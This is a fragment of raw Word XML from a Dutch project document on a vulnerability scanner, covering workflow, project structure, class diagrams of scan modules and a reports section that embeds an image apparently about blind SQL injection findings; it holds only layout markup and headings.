                <wp:docPr id="848" name="Rectangle 8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45E8C" id="Rectangle 848" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2500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H6Z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yn+K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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00537717" w:rsidRPr="00537717">
        <w:t>Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA425D" w14:textId="6A742BD6" w:rsidR="00487AE4" w:rsidRDefault="00487AE4" w:rsidP="00F241F6"/>
    <w:p w14:paraId="6BC0B2B0" w14:textId="05C2A050" w:rsidR="00487AE4" w:rsidRDefault="00A65BD3" w:rsidP="00F241F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253257728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ECE3746" wp14:editId="1A5977D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-520065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7092950" cy="536638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36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7092950" cy="5366385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770ADD3" w14:textId="77777777" w:rsidR="00143F12" w:rsidRDefault="00143F12">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C94ECA" w14:textId="31BB2720" w:rsidR="00143F12" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253308928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6106C1F8" wp14:editId="6C48C188">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="832" name="Rectangle 8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1241A" id="Rectangle 832" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-70.55pt;width:25pt;height:1031.7pt;z-index:-2500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xPp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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="008D40E9">
        <w:t>Projectstructuur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A519" w14:textId="77777777" w:rsidR="00143F12" w:rsidRPr="008D40E9" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253306880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E2AAAE5" wp14:editId="15EABB81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5878195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1933575" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>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Mail.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1933575" cy="95504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5856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6928130F" wp14:editId="4170266D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2442845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1917700" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:wrapSquare wrapText="bothSides"/>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Model.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1917700" cy="336550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3808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="067F06BB" wp14:editId="5231F352">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2211070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3818255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2157730" cy="2291080"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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DAL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2157730" cy="229108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en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253302784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61508440" wp14:editId="68EE87EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2207895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2165350" cy="3715385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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Console en Core.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2165350" cy="371538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4832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E198E5" wp14:editId="66B33E17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4498340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2020570" cy="2277110"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>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Services.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2020570" cy="227711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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0561DB57" wp14:editId="16284A10">
            <wp:extent cx="2083261" cy="6602026"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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rojectstructuur.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2143271" cy="6792204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491998C" w14:textId="64FC2051" w:rsidR="00A52CC1" w:rsidRDefault="00A52CC1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc495181361"/>
    <w:p w14:paraId="0110FB3B" w14:textId="77777777" w:rsidR="00180059" w:rsidRDefault="000242C2" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253284352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C4E319F" wp14:editId="10C54379">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1013634</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="855" name="Rectangle 85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53D92" id="Rectangle 855" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-79.75pt;width:25pt;height:1031.7pt;z-index:-2500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EXJICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kKXS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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00120DEF">
        <w:t>Klasse</w:t>
      </w:r>
      <w:r w:rsidR="00180059">
        <w:t>n Diagrammen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28283D15" w14:textId="1A66F3ED" w:rsidR="00C41B3D" w:rsidRPr="007C4285" w:rsidRDefault="00C41B3D" w:rsidP="00DE58B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B62243" w14:textId="26D6C272" w:rsidR="00AB6653" w:rsidRPr="00DE58B9" w:rsidRDefault="001E691D" w:rsidP="00DE58B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253296640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A493318" wp14:editId="1B06F536">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6412865" cy="5829300"/>
                <wp:effectExtent l="0" t="0" r="13335" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21647"/>
                    <wp:lineTo x="21559" y="21647"/>
                    <wp:lineTo x="21559" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="864" name="Rectangle 864"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6412865" cy="58293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F77F4" id="Rectangle 864" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:17.75pt;width:504.95pt;height:459pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001E7E3E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253299712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="019DC5AA" wp14:editId="64D83F54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6050280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2031365" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="26035" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21607" y="21600"/>
                    <wp:lineTo x="21607" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="867" name="Rectangle 867"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="20313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EDEF8" id="Rectangle 867" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:476.4pt;width:159.95pt;height:126pt;z-index:2532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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F36877">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253297664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="639AFC92" wp14:editId="17EE479D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4244340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>569595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1651000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="865" name="Text Box 865"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1651000" cy="800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014D74" w14:textId="29AD1193" w:rsidR="00E2204E" w:rsidRPr="00F36877" w:rsidRDefault="00E2204E" w:rsidP="00F36877">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>De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AFC92" id="Text Box 865" o:spid="_x0000_s1264" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:334.2pt;margin-top:44.85pt;width:130pt;height:63pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44014D74" w14:textId="29AD1193" w:rsidR="00E2204E" w:rsidRPr="00F36877" w:rsidRDefault="00E2204E" w:rsidP="00F36877">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Deel A</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AB6653">
        <w:t xml:space="preserve">Klasse Diagram van de Scan Modules. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCB501" w14:textId="1B92E696" w:rsidR="009E2309" w:rsidRDefault="00F36877">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668452" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14032C27" wp14:editId="5A2B08DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="7198995"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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Klasse diagram Deel A.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="7198995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6D22C" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="2149B83B" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="242D6589" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="414C6E89" w14:textId="389DAD03" w:rsidR="000F3896" w:rsidRDefault="00F36877">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253295616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22713D78" wp14:editId="0F07C859">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="813" name="Rectangle 8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470CC" id="Rectangle 813" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.8pt;width:25pt;height:1031.7pt;z-index:-2500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Mp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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000F3896">
        <w:t>Klasse Diagram van Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C564AB4" w14:textId="475FF7EA" w:rsidR="000F3896" w:rsidRDefault="00CA49A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253300736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F0B5E54" wp14:editId="5DC11D04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="5908675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>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Klassen Diagram scan.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5908675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA88CC3" w14:textId="2C39469A" w:rsidR="000242C2" w:rsidRDefault="000242C2">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8E224" w14:textId="416C6270" w:rsidR="00FD69F0" w:rsidRDefault="00A65BD3" w:rsidP="00FD69F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253310976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75F6A722" wp14:editId="5D69416F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899334</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="833" name="Rectangle 8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28301" id="Rectangle 833" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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huJ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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FD69F0">
        <w:t>Rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCFDF1" w14:textId="76094A03" w:rsidR="00FD69F0" w:rsidRPr="00FD69F0" w:rsidRDefault="00576CC1" w:rsidP="00FD69F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253315072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03F2EE7F" wp14:editId="5D5D23B7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-10795</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>453390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6249035" cy="6400165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>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BlindSQL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6249035" cy="6400165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
